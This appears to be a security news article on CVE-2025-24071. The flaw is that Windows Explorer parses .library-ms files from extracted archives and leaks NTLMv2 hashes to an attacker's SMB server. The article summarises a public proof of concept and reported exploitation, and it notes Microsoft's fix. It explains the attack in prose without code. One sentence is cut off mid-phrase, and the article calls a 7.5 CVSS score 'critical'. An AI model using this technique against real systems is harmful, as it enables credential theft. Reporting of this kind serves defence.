Microsoft uncovered the information about a critical vulnerability in Windows File Explorer, CVE-2025-24071, with a CVSS score of 7.5. It allows attackers to leak NTLM hashes, which can be used for further attacks like pass-the-hash or offline cracking. The vulnerability has now been fixed by Microsoft.
CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Overview
Cybersecurity agencies have published information about the CVE-2025-24071 vulnerability. This is a critical vulnerability in Windows File Explorer, with a CVSS score of 7.5. It affects multiple versions of Windows, including Windows 10, Windows 11, and various Windows Server versions. The vulnerability arises from Windows Explorer’s implicit trust and automatic parsing of .library-ms files, which are XML-based files used to define search or library locations within the operating system.
The core issue is that when a .library-ms file, crafted with a malicious SMB (Server Message Block) path, is embedded in a RAR or ZIP archive and subsequently extracted, Windows Explorer automatically processes it for indexing, previews, or thumbnails.
This processing triggers an SMB authentication request to the attacker-controlled server, resulting in the disclosure of the user’s NTLMv2 hash. This hash can then be used for attacks such as pass-the-hash or offline NTLM hash cracking, posing significant security risks.
Technical Details
The PoC for CVE-2025-24071 has been released for educational purposes only and is publicly available on GitHub in the eponymous repository, created by a malware and CTI analyst known as 0x6rss. The PoC is implemented as a Python script, designed to demonstrate the exploitation process. The PoC involves creating a specially crafted .library-ms file that includes a
Upon extraction of the archive, Windows Explorer automatically initiates processing of the .library-ms file. This is observed through tools like Procmon, where processes such as Explorer.exe and SearchProtocolHost.exe perform operations like CreateFile, ReadFile, QueryBasicInformationFile, and CloseFile for indexing purposes.
The automatic processing triggers an SMB authentication handshake, captured via Wireshark with an SMB filter (smb or smb2). This includes an SMB2 Negotiate Protocol Request from the victim to the attacker server, followed by an SMB2 Session Setup Request (NTLMSSP_AUTH), which leaks the victim’s NTLMv2 hash. The key feature of this vulnerability is that no user interaction is required beyond extracting the archive, making this a zero-click exploit in certain scenarios.
Exploitation in the Wild and Microsoft Response
Research suggests that CVE-2025-24071 is not only theoretical but actively exploited in the wild. In the aforementioned blog, the author reports that the vulnerability may have been sold on a forum by a threat actor named “Krypt0n,” known for developing EncryptHub Stealer. An X post further corroborates this, detailing how the exploit is configured on a local server (e.g., VPS) with the attacker’s IP and share, triggering hash leaks when accessed by Explorer without file opening.
Microsoft has addressed this vulnerability in the March 2025 Patch Tuesday update, released earlier this month. The patch details are referenced in the Microsoft Security Update Guide. Users of vulnerable systems are advised to upgrade to an up-to-date version of the OS.
